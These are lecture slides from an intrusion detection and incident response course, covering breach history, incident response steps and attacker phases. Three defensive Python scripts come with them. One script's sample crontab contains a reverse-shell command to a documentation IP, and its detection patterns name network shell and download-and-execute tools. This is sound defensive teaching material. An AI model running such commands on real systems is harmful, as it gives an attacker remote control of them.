Lesson 1
Course Introduction
Overview
• Course Administrivia
• Info Assurance Review
• Incident Response
UTSA IS 3523 ID & Incident Response
IS3523 Intrusion Detection
and
Incident Response
• 6:00-7:15 PM M/W
• Robert Kaufman
– Background
– Contact information
• Syllabus and Class Schedule
• Student Background Information
– Email
Student Information
• Name
• Reliable email address
• Email to robkaufmaniii@sbcglobal.net
Text Books
• Course Text:
– Incident Response and Computer Forensics, Kevin Mandia and Chris Prosise, Osborne/McGraw-Hill, 2013. ISBN 978-0072226966
• Additional References:
– Principles of Computer Security, Conklin, White, Cothren,
Williams, and Davis
– Hacking Exposed, by McClure, Scambray, Kurtz
– Cyber crime Investigator’s Field Guide, by Bruce Middleton
Grading
• Grades
– 2 Tests
– Final
– Many Projects/Labs
A Sampling of Malicious Activity
• March 1999 - EBay gets hacked
• March 1999 - Melissa virus hits Internet
• April 1999 - Chernobyl Virus hits
• May 1999 - Hackers shut down web sites of FBI, Senate, and DOE
• June 1999 - Worm.Explore.Zip virus hits
• July 1999 - Cult of the Dead Cow (cDc) releases Back Orifice
• Sept 1999 - Hacker pleads guilty to attacking NATO and Gore web sites
• Oct 1999 - Teenage hacker admits to breaking into AOL
A Sampling of Malicious Activity
• Nov 1999 - BubbleBoy virus hits
• Dec 1999 - Babylonia virus spreads
• Feb 2000 - Several sites experience DoS attacks
• Feb 2000 - Alaska Airlines site hacked
• May 2000 - Love Bug virus ravages net
• July 2001 – Code Red Runs Rampant
• Sept 2001 – Nimda Explodes
A Sampling of Malicious Activity
• Jan 2003 – Sapphire/Slammer Worm
• Aug 2003 – Blaster (LoveSan) Worm
• Jan 2004 – MyDoom
• Mar 2004 – Witty Worm
• May 2004 – Sasser Worm
• Dec 2006 – TJX Credit/Debit Card Theft
• Jan 2007 – Storm Worm
• Mar 2009 - Conficker
• June 2010 - Stuxnet
Source: http://en.wikipedia.org/wiki/Timeline_of_notable_computer_viruses_and_worms
Computer Crime
• Surveys of Computer Crime
– CSI/FBI
– NCSA/ICSA Labs (survey of computer virus incidents)
– CERT-CC Summaries
• Computer Criminals
– Varied skills, background, motives
• What is a computer crime?
– Is breaking into a system without theft, vandalism, or
obvious breach of confidentiality a crime?
• Who are you asking – Law Enforcement? Hacker?
• How does this apply to virus writers?
Nature of the Threat
• WHAT is an attack?
• WHO is attacking (or may attack)?
• WHY are they attacking (or why would they)?
Methodology:
• Historical understanding (based on writings
AND actions)
• Threat = capability + intent
Mandiant APT1
Chart (recoverable labels only): a 2006–2012 timeline of industries targeted by APT1: Information Technology, Transportation, High Tech Electronics, Financial Services, Navigation, Legal Services, Engineering Services, Media, Advertising & Entertainment, Food and Agriculture, Satellites & Telecommunications, Chemicals, Energy, International Organizations, Scientific Research and Consulting, Public Administration, Construction & Manufacturing.
Notable SQL Injection Breaches
Chart (2007–2013), entries as labeled: Federal Reserve (4,000), LivingSocial (50,000,000), Domino's Pizza (37,000), Global Payments (1,600,000 records; $92,000,000), Diner's Club (500,000), Gamigo (11,000,000), Ingenicard ($9,000,000), Sony PlayStation (7,000,000), Sony Pictures (1,000,000), Dexia Bank (1,700,000), TJX (47,000,000), LinkedIn (6,500,000), VISA Jordan (800,000), Yahoo (450,000), Target? (70,000,000), Adobe (150,000), Heartland (130,000,000), Hannaford (4,200,000). Also on the chart, with labels that did not survive extraction: FBI/NASA, Fed Gov't, a count of 100,000, and losses of $254M and $455M.
Source: http://codecurmudgeon.com/wp/sql-injection-hall-of-shame/
Notable Recent Activity
• SONY Hack
• Anthem – Medical Data
• $1B Worldwide Bank Heist
• Target
• Heartland Payment Systems (and the earlier TJX / TJ Maxx credit card theft)
• Traffic reroutes (Russia/China, China/Belarus)
• VENOM ("virtualized environment neglected operations manipulation", a guest escape through the QEMU virtual floppy controller) shatters the myth of cloud security
You have to have security, or else…
• 2001 CSI/FBI Computer Crime and Security Survey
– 538 security “practitioners” in the U.S.
• 91% reported computer security breaches within the previous 12
months
• 70% reported their Internet connection as a frequent point of
attack (up from 59% in 2000)
• 64% suffered financial losses due to breaches, 35% could quantify
this loss.
• Losses due to computer security breaches totaled (for the 186
respondents reporting a loss) $377,828,700
• Average loss $2,031,337
– Source: Computer Security Institute http://www.gocsi.com
And the hits just keep coming…
• 2002 CSI/FBI Computer Crime & Security Survey
– 503 security “practitioners” in the U.S.
• 90% detected computer security breaches
• 40% detected penetrations from the outside
• 80% acknowledged financial losses due to breaches
• Losses due to computer security breaches totaled $455,848,000 (for the 223 respondents reporting a loss)
• 26 reported theft of proprietary info ($170,827,000)
• 25 reported financial fraud ($115,753,000)
• 34% reported intrusions to law enforcement
• 78% detected employee abuse of internet access privileges, i.e.
pornography and inappropriate email use
– Source: Computer Security Institute http://www.gocsi.com
And coming
• A 2003 FBI/CSI Computer Crime and Security Survey revealed the following:
– 60% had a security breach in the last year.
– 78% detected employee abuse of internet privileges.
– 85% admitted to being infected by a computer virus.
– Average loss from insider access was $300,000
– Average loss due to virus attack was $283,000
– Average loss from telecom eavesdropping was $1,205,000
– Average loss from outsider penetration was $226,000
– Average reported loss from net abuse was $536,000
Source: Computer Security Institute http://www.gocsi.com
Internet Security Software Market
2002 - $7.4 Billion est.
1999 - $4.2 Billion
1998 - $3.1 Billion
1997 - $2 Billion
’97 & ’98 figures based on a study released by market research firm International Data Corp. in Framingham, Mass.
’99 & ’02 figures from IDC study based on a survey of 300 companies with more than $100 million in annual revenues
DISA VAAP Results
Funnel chart (recoverable values): of 38,000 attacks, 13,300 were blocked and 24,700 succeeded (Protection). Of the 24,700 that succeeded, 988 were detected and 23,712 went undetected (Detection). Of the 988 detected, 267 were reported and 721 were not reported (Reaction).
Computer Security
The prevention and/or detection of unauthorized actions by users of a computer system.
In the beginning, this meant ensuring privacy on shared systems. Today, the interesting aspect of security is enabling different access levels.
What are our goals in Security?
• The “CIA” of security
– Confidentiality
– Integrity
• Data integrity
• Software Integrity
– Availability
• Accessible and usable on demand
– (authentication)
– (nonrepudiation)
The “root” of the problem
• Most security problems can be grouped into one of
the following categories:
– Network and host misconfigurations
• Lack of qualified people in the field
– Operating system and application flaws
• Deficiencies in vendor quality assurance efforts
• Lack of qualified people in the field
• Lack of understanding of/concern for security
Computer Security Operational Model
Protection = Prevention + (Detection + Response)
• Prevention: Access Controls, Encryption, Firewalls
• Detection: Intrusion Detection
• Response: Incident Handling
Proactive –vs- Reactive Models
• “Most organizations only react to security
threats, and, often times, those reactions come
after the damage has already been done.”
• “The key to a successful information security
program resides in taking a pro-active stance
towards security threats, and attempting to
eliminate vulnerability points before they can
be used against you.”
So What Happens When
Computer Security Fails?
• Incident Response Methodology--7 Step Process
– Preparation: Proactive Computer Security
– Detection of Incidents
– Initial Response
– Formulate Response Strategy
– Investigate the Incident
– Reporting
– Resolution
7 Components of Incident Response
• Pre-Incident Preparation
• Detection of Incidents
• Initial Response
• Formulate Response Strategy
• Investigate the Incident (Data Collection, Data Analysis)
• Reporting
• Resolution (Recovery, Implement Security Measures)
Page 15, Fig 2-1, Mandia 2nd Edition
Incident response flow (reconstructed from the flowchart):
• Pre-Incident Preparation
• Detection of Incidents: notification checklist completed, incident response team formed
• Initial Response: is it really an incident? If no, stop; if yes, continue
• Formulate Response Strategy: pursue and accumulate evidence and/or secure the system (both paths can be pursued simultaneously)
– Accumulate Evidence: forensic duplication? If yes, perform forensic duplication; then Investigation
– Secure System: implement security measures, perform network monitoring, isolate and contain
• Reporting
• Follow-Up
Page 18, Fig 2-1, Mandia 1st Edition
Resources in the Fight
• SANS
• CERT CC
• FIRST
• DOE CIAC
• CERIAS
• NIST
SANS
• System Administration, Networking, and
Security (SANS) Institute
• Global Incident Analysis Center
• Security Alerts, Updates, & Education
• NewsBites, Security Digest, Windows
Digest
• Certification
• http://www.sans.org/
Carnegie Mellon CERT CC
• Computer Emergency Response
Team Coordination Center
• Started by DARPA
• Alerts & Response Services
• Training and CERT Standup
• Clearing House
• http://www.cert.org
FIRST
• Forum of Incident Response and Security
Teams
• Established 1988
• Govt & Private Sector Membership
• Over 70 Members
• Coordinate Global Response
• http://www.first.org
DOE CIAC
• Computer Incident Advisory Capability
• Established 1989
• Part of Lawrence Livermore Lab
• Awareness training and education
• Trend, threat, vulnerability data collection and
analysis
• http://ciac.llnl.gov/
CERIAS
• Center for Education and Research in
Information Assurance and Security
• Home of Gene Spafford
• A "University Center"
• InfoSec Research & Education
• Members: Academia, Govt, & Industry
• http://www.cerias.purdue.edu/coast/
NIST
• National Institute of Standards and Technology (NIST)
• Operates the Computer Security Resource Clearinghouse (CSRC)
• Raising awareness
• Multiple disciplines
• Main source of Federal Government standards
• http://csrc.ncsl.nist.gov/
So How Many Vulnerabilities Are Out There?
Let's see what the CERT CC says.
History Lesson
The Art of War, Sun Tzu
Lesson for you
• Know the enemy
• Know yourself…and in a hundred battles you will never be defeated
• If ignorant both of your enemy and of
yourself you are certain in every battle to
be in peril
History Lesson
The Art of War, Sun Tzu
Lesson for the Hacker
• Probe him and learn where his strength is
abundant and where deficient
• To subdue the enemy without fighting is
the acme of skill
• One able to gain victory by modifying his tactics in accordance with the enemy situation may be said to be divine
Hacker Attacks
• Intent is for you to know your enemy
• Not intended to make you a hacker
• Need to know defensive techniques
• Need to know where to start the recovery process
• Need to assess the extent of the investigative environment
Anatomy of a Hack
• Footprinting
• Scanning
• Enumeration
• Gaining Access
• Escalating Privilege
• Pilfering
• Covering Tracks
• Creating Backdoors
• Denial of Service
Source: Hacking Exposed, McClure, Scambray, and Kurtz
Footprinting
Objective
• Target address range
• Acquire namespace
• Information gathering
• Surgical attack
• Don't miss details
Technique
• Open source search
• whois
• Web interface to whois
• ARIN whois
• DNS zone transfer
Source: Hacking Exposed, McClure, Scambray, and Kurtz
Scanning
Objective
• Bulk target assessment
• Determine listening services
• Focus attack vector
Technique
• Ping sweep
• TCP/UDP scan
• OS detection
Source: Hacking Exposed, McClure, Scambray, and Kurtz
Enumeration
Objective
• Intrusive probing commences
• Identify valid accounts
• Identify poorly protected shares
Technique
• List user accounts
• List file shares
• Identify applications
Source: Hacking Exposed, McClure, Scambray, and Kurtz
Gaining Access
Objective
• Informed attempt to access target
• Typically user-level access
Technique
• Password sniffing
• File share brute forcing
• Password file grab
• Buffer overflows
Source: Hacking Exposed, McClure, Scambray, and Kurtz
Escalating Privilege
Objective
• Gain root-level access
Technique
• Password cracking
• Known exploits
Source: Hacking Exposed, McClure, Scambray, and Kurtz
Pilfering
Objective
• Info gathering to access trusted systems
Technique
• Evaluate trusts
• Search for cleartext passwords
Source: Hacking Exposed, McClure, Scambray, and Kurtz
Cover Tracks
Objective
• Ensure highest access
Technique
• Clear logs
• Hide tools
• Hide access from system administrator or owner
Source: Hacking Exposed, McClure, Scambray, and Kurtz
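The defensive counterpart to "clear logs" is noticing that a log has been tampered with. The script below is an added example written for this lesson, not code from Hacking Exposed or the course text: it parses a constructed syslog excerpt (the year, the host name web1 and the entries are all made up for the demo) and reports two tell-tale signs of tampering, a silent gap longer than the expected cadence of a periodic job, and a timestamp that goes backwards, which is what you see when an attacker truncates the file and later activity is appended after forged or restored lines.

```python
import re
from datetime import datetime, timedelta

# Constructed syslog excerpt for the example (no real host); the cron job
# normally fires every 10 minutes, so a 2h10m silence is not plausible.
SAMPLE_SYSLOG = """\
Mar  1 10:00:01 web1 CRON[1001]: (root) CMD (/usr/lib/sysstat/sa1 1 1)
Mar  1 10:10:01 web1 CRON[1015]: (root) CMD (/usr/lib/sysstat/sa1 1 1)
Mar  1 10:20:01 web1 CRON[1030]: (root) CMD (/usr/lib/sysstat/sa1 1 1)
Mar  1 10:30:01 web1 CRON[1044]: (root) CMD (/usr/lib/sysstat/sa1 1 1)
Mar  1 12:40:01 web1 CRON[1310]: (root) CMD (/usr/lib/sysstat/sa1 1 1)
Mar  1 12:20:17 web1 sshd[1290]: Accepted password for alice from 203.0.113.9 port 51022 ssh2
Mar  1 12:50:01 web1 CRON[1325]: (root) CMD (/usr/lib/sysstat/sa1 1 1)
"""

# Classic BSD syslog header: "Mon dd hh:mm:ss host message" (no year on the line).
SYSLOG_RX = re.compile(
    r"^(?P<mon>[A-Z][a-z]{2}) +(?P<day>\d{1,2}) (?P<time>\d\d:\d\d:\d\d) "
    r"(?P<host>\S+) (?P<msg>.*)$"
)


def parse_syslog(text, year=2024):
    """Yield (timestamp, message) for each parseable line.

    The year is supplied by the caller because the syslog header omits it
    (an assumption of this example: one calendar year per file).
    """
    for line in text.splitlines():
        m = SYSLOG_RX.match(line)
        if m:
            ts = datetime.strptime(f"{year} {m['mon']} {m['day']} {m['time']}",
                                   "%Y %b %d %H:%M:%S")
            yield ts, m["msg"]


def find_log_anomalies(text, max_gap=timedelta(minutes=30)):
    """Report (kind, previous_ts, this_ts, message) for suspicious sequencing.

    GAP:          more than max_gap of silence between consecutive entries.
    OUT_OF_ORDER: an entry whose timestamp precedes the latest one seen.
    """
    findings = []
    high_water = None  # latest timestamp seen so far, kept across reordered lines
    for ts, msg in parse_syslog(text):
        if high_water is not None:
            if ts < high_water:
                findings.append(("OUT_OF_ORDER", high_water, ts, msg))
            elif ts - high_water > max_gap:
                findings.append(("GAP", high_water, ts, msg))
        high_water = ts if high_water is None else max(high_water, ts)
    return findings


if __name__ == "__main__":
    for kind, prev_ts, ts, msg in find_log_anomalies(SAMPLE_SYSLOG):
        print(f"{kind:13} {prev_ts:%H:%M:%S} -> {ts:%H:%M:%S}  {msg[:50]}")
```

Set max_gap from the cadence of a job you know runs on the host (cron, sysstat, a MARK line); a gap detector with no baseline produces noise on quiet systems and silence on busy ones. Timestamp regressions also occur legitimately after an NTP step, so correlate with the time daemon's own log before calling it tampering.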
Creating Back Doors
Objective
• Deploy trap doors
• Ensure easy return access
Technique
• Create rogue user accounts
• Schedule batch jobs
• Infect startup files
• Plant remote control services
• Install monitors
• Trojanize
Source: Hacking Exposed, McClure, Scambray, and Kurtz
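Two of the back-door techniques above, rogue user accounts and scheduled batch jobs, leave artifacts a responder can audit directly. The script below is an added example for this lesson, not code from Hacking Exposed or the Mandia text: it checks constructed /etc/passwd, /etc/shadow and crontab contents (the accounts toor and sysupdate, the hashes and the cron lines are all made up for the demo) for a second uid-0 account, an interactive account with no password, a home directory in a world-writable location, and cron commands that run from /tmp or open a reverse shell.

```python
import re

# Constructed account and scheduler data for the example (not from any real host).
PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
alice:x:1000:1000:Alice:/home/alice:/bin/bash
toor:x:0:0:backup:/:/bin/bash
sysupdate:x:1001:1001::/tmp/.x:/bin/sh
"""
SHADOW = """\
root:$6$saltsalt$fakehash:19000:0:99999:7:::
daemon:*:19000:0:99999:7:::
www-data:*:19000:0:99999:7:::
alice:$6$saltsalt$fakehash2:19000:0:99999:7:::
toor:$6$saltsalt$fakehash3:19000:0:99999:7:::
sysupdate::19000:0:99999:7:::
"""
CRONTAB = """\
# m h dom mon dow command
0 2 * * * /usr/bin/backup.sh
*/5 * * * * /tmp/.x/update.sh
@reboot bash -c 'bash -i >& /dev/tcp/203.0.113.5/4444 0>&1'
30 1 * * * /usr/sbin/logrotate /etc/logrotate.conf
"""

NOLOGIN_SHELLS = {"/usr/sbin/nologin", "/sbin/nologin", "/bin/false"}
SUSPICIOUS_HOME = ("/tmp/", "/var/tmp/", "/dev/shm/")
SUSPICIOUS_CRON = [
    (re.compile(r"(^|\s)/(tmp|var/tmp|dev/shm)/"), "runs from a world-writable directory"),
    (re.compile(r"/dev/tcp/|\b(nc|ncat|socat)\b"), "reverse shell or network listener"),
    (re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b|\bbase64\b"), "download-and-execute or encoded payload"),
]


def audit_passwd(passwd_text, shadow_text):
    """Return (account, reason) findings for rogue-looking accounts."""
    shadow_field = {}
    for line in shadow_text.splitlines():
        if line.strip():
            name, pw = line.split(":")[:2]
            shadow_field[name] = pw          # "" = no password, "*"/"!" = locked
    findings = []
    for line in passwd_text.splitlines():
        if not line.strip():
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append((fields[0], "malformed passwd entry"))
            continue
        name, _, uid, _gid, _gecos, home, shell = fields
        interactive = shell not in NOLOGIN_SHELLS
        if uid == "0" and name != "root":
            findings.append((name, "uid 0 account other than root"))
        if interactive and shadow_field.get(name) == "":
            findings.append((name, "interactive shell with empty password"))
        if interactive and (home.startswith(SUSPICIOUS_HOME) or "/." in home):
            findings.append((name, f"suspicious home directory {home}"))
    return findings


def audit_crontab(text):
    """Return (line_no, reason, command) for crontab entries matching persistence patterns."""
    findings = []
    for line_no, line in enumerate(text.splitlines(), 1):
        entry = line.strip()
        if not entry or entry.startswith("#"):
            continue
        nfields = 1 if entry.startswith("@") else 5   # "@reboot cmd" vs "m h dom mon dow cmd"
        parts = entry.split(None, nfields)
        command = parts[nfields] if len(parts) > nfields else ""
        for rx, reason in SUSPICIOUS_CRON:
            if rx.search(command):
                findings.append((line_no, reason, command))
    return findings


if __name__ == "__main__":
    for name, reason in audit_passwd(PASSWD, SHADOW):
        print(f"passwd  {name:10} {reason}")
    for line_no, reason, command in audit_crontab(CRONTAB):
        print(f"cron:{line_no:<3} {reason}: {command}")
```

On a live system the same checks should also cover /etc/cron.d, the per-user spools under /var/spool/cron, systemd timers and rc/init scripts, since the attacker's "infect startup files" step has many more targets than the system crontab; and compare the results against a known-good baseline taken during pre-incident preparation rather than against intuition.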
Denial of Service
Objective
• If unable to escalate privilege, then kill
• Build DDoS network
Technique
• SYN flood
• ICMP attacks
• Identical src/dst SYN requests (LAND)
• Out-of-bounds TCP options
• DDoS
Source: Hacking Exposed, McClure, Scambray, and Kurtz
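The Scanning and Denial of Service techniques above are the ones a network-side intrusion detector sees most often, and they fall out of the same counters. The script below is an added example for this lesson, not code from Hacking Exposed or any IDS product: it parses a constructed packet-summary log (the one-line-per-packet format, the addresses in 192.0.2.0/24, 198.51.100.0/24, 203.0.113.0/24 and 10.0.0.0/8, and the thresholds are all assumptions of the example) and raises a port-scan alert when one source touches many ports on one host, a host-sweep alert when one source touches many hosts, a SYN-flood alert when one service receives many SYNs in a window, and a LAND alert for a packet whose source equals its destination.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Assumed log line format for this example (not a real firewall's syntax):
# "<ISO timestamp> <proto> <src>[:<sport>] -> <dst>[:<dport>] <flags>"
LINE_RX = re.compile(
    r"^(?P<ts>\S+) (?P<proto>TCP|UDP|ICMP) "
    r"(?P<src>[\d.]+)(?::(?P<sport>\d+))? -> "
    r"(?P<dst>[\d.]+)(?::(?P<dport>\d+))? (?P<flags>\S+)$"
)
EPOCH = datetime(2024, 1, 1)  # fixed reference so window buckets do not depend on local time


def parse_line(line):
    """Return a dict for a well-formed line, or None so a bad line never aborts the run."""
    m = LINE_RX.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.fromisoformat(rec["ts"])
    return rec


def detect(lines, window_s=60, scan_ports=20, sweep_hosts=10, flood_syns=100):
    """Fixed-window counters over the log; returns a list of (kind, actor, detail)."""
    ports_seen = defaultdict(set)   # (bucket, src, dst)   -> distinct destination ports
    hosts_seen = defaultdict(set)   # (bucket, src)        -> distinct destination hosts
    syn_count = defaultdict(int)    # (bucket, dst, dport) -> SYN packets received
    syn_srcs = defaultdict(set)     # (bucket, dst, dport) -> distinct senders
    alerts = []
    for rec in filter(None, map(parse_line, lines)):
        bucket = int((rec["ts"] - EPOCH).total_seconds() // window_s)
        if rec["src"] == rec["dst"]:  # LAND-style packet: identical source and destination
            alerts.append(("LAND", rec["src"], f"identical src/dst, flags={rec['flags']}"))
        hosts_seen[(bucket, rec["src"])].add(rec["dst"])
        if rec["dport"] is not None:
            ports_seen[(bucket, rec["src"], rec["dst"])].add(rec["dport"])
        if rec["proto"] == "TCP" and rec["flags"] == "SYN":
            key = (bucket, rec["dst"], rec["dport"])
            syn_count[key] += 1
            syn_srcs[key].add(rec["src"])
    for (_, src, dst), ports in ports_seen.items():
        if len(ports) >= scan_ports:
            alerts.append(("PORT_SCAN", src, f"{len(ports)} distinct ports on {dst}"))
    for (_, src), hosts in hosts_seen.items():
        if len(hosts) >= sweep_hosts:
            alerts.append(("HOST_SWEEP", src, f"{len(hosts)} distinct hosts"))
    for key, n in syn_count.items():
        if n >= flood_syns:
            _, dst, dport = key
            alerts.append(("SYN_FLOOD", f"{dst}:{dport}",
                           f"{n} SYNs from {len(syn_srcs[key])} sources in {window_s}s"))
    return alerts


def build_sample_log():
    """Constructed traffic for the demo (not captured from any real network)."""
    t0 = datetime(2024, 3, 1, 10, 0, 0)

    def stamp(i):
        return (t0 + timedelta(seconds=i % 50)).isoformat()

    lines = [  # benign: one completed handshake and a ping
        f"{stamp(0)} TCP 203.0.113.9:50012 -> 192.0.2.10:443 SYN",
        f"{stamp(1)} TCP 203.0.113.9:50012 -> 192.0.2.10:443 ACK",
        f"{stamp(2)} ICMP 203.0.113.9 -> 192.0.2.10 ECHO",
    ]
    # port scan: one source walks 40 ports on one host
    lines += [f"{stamp(i)} TCP 198.51.100.7:{40000 + i} -> 192.0.2.10:{i} SYN" for i in range(1, 41)]
    # host sweep: one source probes port 445 on 30 hosts
    lines += [f"{stamp(i)} TCP 198.51.100.8:40001 -> 192.0.2.{i}:445 SYN" for i in range(1, 31)]
    # SYN flood: 150 SYNs from 150 (spoofed) sources at one web server, no ACKs ever follow
    lines += [f"{stamp(i)} TCP 10.0.{i}.1:{1024 + i} -> 192.0.2.20:80 SYN" for i in range(150)]
    # LAND-style packet: source and destination are the victim itself
    lines.append(f"{stamp(3)} TCP 192.0.2.20:80 -> 192.0.2.20:80 SYN")
    return lines


if __name__ == "__main__":
    for kind, actor, detail in detect(build_sample_log()):
        print(f"{kind:10} {actor:18} {detail}")
```

The counters are keyed on fixed, aligned windows, so a slow scan that straddles a window boundary, or spreads one probe per minute over an hour, is split across buckets and stays under threshold; that is exactly the evasion real scanners offer, and a production detector needs sliding windows or per-source state that decays slowly. The SYN-flood rule also deliberately reports the number of distinct senders: a flood from many sources with a single SYN each is the spoofed pattern, while many SYNs from one source is usually a broken client.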
Hacker Exploits per SANS
• Reconnaissance
• Scanning
• Exploit Systems
• Keeping Access
• Cover Tracks
Source: SANS Institute
Hacking Summary
• Threat: hacking on the rise
• Security posture usually reactive
• Losses increasing
• 7-step process
• Hacker techniques